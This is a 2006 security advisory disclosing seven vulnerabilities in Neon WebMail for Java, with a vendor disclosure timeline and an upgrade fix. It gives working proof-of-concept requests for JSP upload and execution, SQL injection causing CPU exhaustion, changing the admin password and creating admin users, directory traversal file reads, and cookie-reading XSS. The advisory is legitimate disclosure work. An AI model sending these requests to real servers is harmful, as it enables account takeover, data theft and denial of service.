vuln.sg Vulnerability Research Advisory

Neon WebMail for Java Multiple Vulnerabilities by Tan Chew Keong Release Date: 2006-09-20    [en] [jp] Summary 7 vulnerabilities have been found in Neon WebMail for Java. When exploited, these vulnerabilities allow executing of arbitrary JSP code, escalation of user's privileges, manipulating of user's emails and user account information, disclosure of files on the server, and potentially cause a DoS via large CPU resource utilisation by the MySQL server. Tested Versions Neon WebMail for Java version 5.06 and 5.07 (build.200607050) Details This advisory discloses 7 vulnerabilities found in Neon WebMail for Java. 1) JSP File Upload and Execution The default configuration stores user's email file attachments using their original filename and extension under "/neonwebmail/users/username/YYYYMMDD/file.ext". Since this directory is accessible via the Tomcat server, it is possible to execute JSP code on the server by sending an email containing JSP file attachments to a user. This can be exploited in three ways. (a) By Unauthorized Users (when at least one email address is known) Send an email with a ".JSP" file attachment (e.g. file.jsp) to a user. When the user opens the email in Neon Webmail, the ".JSP" attachment will be saved with its original filename to "/neonwebmail/users/username/YYYYMMDD/". Now access the "http://[host]:8080/neonwebmail/users/username/YYYYMMDD/file.jsp" directory to execute the JSP code. (b) By Authenticated Users (method 1) An authenticated user can simply send a mail containing a ".JSP" file attachment to himself. A copy of the mail will end up the user's send folder and a copy of the attachment will be in "/neonwebmail/users/username/YYYYMMDD/". (c) By Authenticated Users (method 2) IF THE SMTP SERVER IS NOT PROPERLY CONFIGURED When a authenticated user uses Neonmail to compose an email containing attachments, the attachment files will be temporarily saved to "/neonwebmail/users/username/YYYYMMDD/" with their original filenames. These files will subsequently be deleted IF THE SMTP SERVER IS NOT REACHABLE. However, it is possible to access these files before they are deleted to execute JSP code in ".JSP" attachments. NOTE: The attachment files are deleted quickly. However, it is possible to write a program that constantly tries to access "http://[host]:8080/neonwebmail/users/username/YYYYMMDD/attachment.jsp" at short intervals. The deletion of the files can also be slowed down by uploading multiple large attachments in the same composed email. The email form allows up to 3 file attachments to be sent in one POST request. First, compose an email with a malicious ".JSP" file as the first attachment and a large file 1MB+ as the second attachment. Next, start the program to poll for the malicious JSP file. Finally, submit the email. The malicious ".JSP" file that was submitted as the first attachment will be executed.   2) "updatemail" Servlet Arbitrary Email Manipulation The "updatemail" servlet does not validate userid when handling requests to move mails from one folder to another. It is possible for a malicious user to move emails of another user to a non-existing folder, thus causing his mails to appear "missing". Example: (a) To move Mail ID = 1 to the Trash Folder (Folder ID = -9): NOTE: This assumes that a mail with ID = 1 exists. Mail ID = 1 may be an email belonging to another user. Mails are assigned increasing ID numbers. http://192.168.1.64:8080/neonwebmail/updatemail?ID=1&getpost=get&folderid=-1&tofolderid=-9&status=1&execute=move (b) Move Mail ID = 1 from Trash Folder (Folder ID = -9) to non-existing folder (Folder ID = 100): http://192.168.1.64:8080/neonwebmail/updatemail?ID=1&getpost=get&folderid=-9&tofolderid=100&status=1&execute=move NOTE: The victim will only be able to read his mails if he knows the folder number.   3) "addrlist" Servlet SQL Injection Vulnerability SQL injection is possible in the "adr_sortkey" and "adr_sortkey_desc" parameters as they are used as column names without sanitisation in the "SORT BY" portion of a SELECT query in the "DB_ADDR_BOOK" class. If MySQL is used as the backend database, this can potentially be exploited to cause the mysqld process to consume large amount of CPU resources. NOTE: In order to exploit this, the user must have at least one entry in his address book. Example: http://192.168.1.64:8080/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= This generates the following manipulated query: SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BY ID,rand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC   4) "maillist" Servlet SQL Injection Vulnerability SQL injection is possible in the "sortkey" and "sortkey_desc" parameters as they are used as column names without sanitisation in the "SORT BY" portion of a SELECT query in the "DB_MAIL_DATA" class. If MySQL is used as the backend database, this can potentially be exploited to cause the mysqld process to consume large amount of CPU resources. NOTE: In order to exploit this, the user must have at least one mail in his INBOX, or in the mail folder indicated by the "folderid" parameter in the malicious query. Example: http://192.168.1.64:8080/neonwebmail/maillist?getpost=get&PAGE=1&folderid=-1&sysid=0&sortkey=SENDER, rand(benchmark(1000000000000,sha1('123456781234567812345678')))&sortkey_desc=&sendkind=&searchlist= This generates the following manipulated query: SELECT T.* FROM T_MAIL_DATA T WHERE T.ID = 'username' AND (T.ISTRASH = '0' OR T.ISTRASH IS NULL) AND T.FOLDERID = -1 ORDER BY T.ID,T.SENDER,rand(benchmark(1000000000000,sha1('123456781234567812345678'))),T.SYSID DESC ,T.GETPOST   5) "updateuser" servlet Parameter Manipulation The "updateuser" servlet allows a user to update his Personal Profile settings. The servlet does not validate the "in_id" parameter (user id) before using the supplied data to update a user's Personal Profile Settings. It is possible to exploit this to update ANY user's Personal Profile Settings. For example, while login as a NON-ADMIN user, it is possible to: (a) Change "admin" user's passwords to "hacked" via the following request. http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1& in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update (b) Give "guest" user admin privileges via the following request. http://192.168.1.64:8080/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1& in_showmailcount=20&in_usecss=1&in_autopoptime=5&in_poppop=1&in_replysign=&in_formwidth=80&exe=update (c) View "admin" user's Personal Profile Settings (including password) via the following request. http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&exe=read (d) Add an Administrative user "super" via the following request. http://192.168.1.64:8080/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1& in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=insert (e) Delete arbitrary users e.g. "super" http://192.168.1.64:8080/neonwebmail/updateuser?in_id=super&exe=delete (f) Inject Javascript into "admin" user's "Name" field via the following request. http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&in_pass=hacked& in_name=<script>alert(document.cookie);</script>&in_admin=1&in_showmailcount=10& in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update   6) "downloadfile" Servlet Arbitrary File Disclosure Vulnerability. The "downloadfile" servlet allows the user to download his/her email attachments. Directory traversal is possible using the "savefolder" and "savefilename" parameters. This allows an authenticated user to retrieve arbitrary files accessible by the application server. http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext&savefolder=[traversal]&savefilename=[traversal] Examples: http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext& savefolder=anything&savefilename=/../../../../../../../../../boot.ini http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext& savefolder=/../../../../../../../../../boot.ini&savefilename= http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext& savefolder=/../../../../../../../../../&savefilename=boot.ini   7) User's name Field Script Insertion (XSS) Under the "Settings" Tab in Neonmail, a user can configure his name under his Personal Profile settings. It is possible to input Javascript in this field. ("in_name" parameter) The user's name will be displayed when the administrative user views a list of all users. This can be exploited to execute Java script code in the context of the administrative user's session, potentially to steal the administrative user's session cookie. Example: a) Logon as normal user and input <script>alert(document.cookie);</script> into the "Name" field. b) Logon as administrative user and view lists of all users.   Patch / Workaround According to the vendor, the vulnerabilities have been fixed in version 5.08. Update to the fixed version. Disclosure Timeline 2006-07-04 - Vulnerability Discovered. 2006-07-12 - Initial Vendor Notification. 2006-07-13 - Initial Vendor Reply. 2006-08-09 - Vendor Reminder Sent. 2006-08-09 - Vendor replied that fixed version will be released in late August. 2006-09-01 - Vendor Reminder Sent. 2006-09-05 - Vendor Reminder Sent. 2006-09-17 - Vendor Released Fixed Version. 2006-09-20 - Public Release.

Contact

For further enquries, comments, suggestions or bug reports, simply email them to